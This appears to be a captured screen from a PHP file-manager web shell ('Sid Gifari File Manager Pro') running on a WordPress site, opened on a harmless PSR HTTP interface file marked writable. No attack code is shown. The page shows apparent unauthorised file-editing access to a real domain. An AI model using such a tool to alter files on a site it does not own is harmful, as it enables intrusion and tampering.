🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-18 16:12:26 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
themomotimes.com
/
wp-includes
/
php-ai-client
/
third-party
/
Psr
/
Http
/
Message
📍 /home/therahul/themomotimes.com/wp-includes/php-ai-client/third-party/Psr/Http/Message
🔄 Refresh
✏️
Editing: UriFactoryInterface.php
Writable
<?php namespace WordPress\AiClientDependencies\Psr\Http\Message; interface UriFactoryInterface { /** * Create a new URI. * * @param string $uri * * @return UriInterface * * @throws \InvalidArgumentException If the given URI cannot be parsed. */ public function createUri(string $uri = ''): UriInterface; }
💾 Save Changes
❌ Cancel